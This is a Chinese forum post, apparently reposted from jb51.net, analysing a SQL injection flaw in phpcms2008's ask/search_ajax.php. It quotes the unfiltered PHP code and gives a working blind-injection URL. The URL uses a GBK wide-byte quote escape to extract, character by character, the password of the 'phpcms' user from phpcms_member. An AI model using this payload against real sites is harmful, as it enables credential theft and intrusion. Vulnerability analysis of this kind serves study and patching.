• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    phpcms2008 注入漏洞 利用分析

    发布者: 涵韵 | 发布时间: 2025-6-27 15:38| 查看数: 28| 评论数: 0|帖子模式

    这个是最新有人发现的

    该漏洞文件:ask/search_ajax.php

    漏洞说明:
    /ask/search_ajax.php
    Code:

    if($q)
    {
    $where = " title LIKE '%$q%' AND status = 5";//没做过滤直接感染了$where
    }
    else
    {
    exit('null');
    }
    $infos = $ask->listinfo($where, 'askid DESC', '', 10);
    /ask/include/answer.class.php
    Code:

    function listinfo($where = '', $order = '', $page = 1, $pagesize = 50)
    {
    if($where) $where = " WHERE $where";
    if($order) $order = " ORDER BY $order";
    $page = max(intval($page), 1);
    $offset = $pagesize*($page-1);
    $limit = " LIMIT $offset, $pagesize";
    $r = $this->db->get_one("SELECT count(*) as number FROM $this->table_posts $where");
    $number = $r['number'];
    $this->pages = pages($number, $page, $pagesize);
    $array = array();
    $i = 1;
    $result = $this->db->query("SELECT * FROM $this->table_posts $where $order $limit");
    while($r = $this->db->fetch_array($result))
    {
    $r['orderid'] = $i;
    $array[] = $r;
    $i++;
    }
    $this->number = $this->db->num_rows($result);
    $this->db->free_result($result);
    return $array;
    }
    测试方法:

    复制代码代码如下:
    /ask/search_ajax.php?q=s%D5'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23


    来源:https://www.jb51.net/hack/12784.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表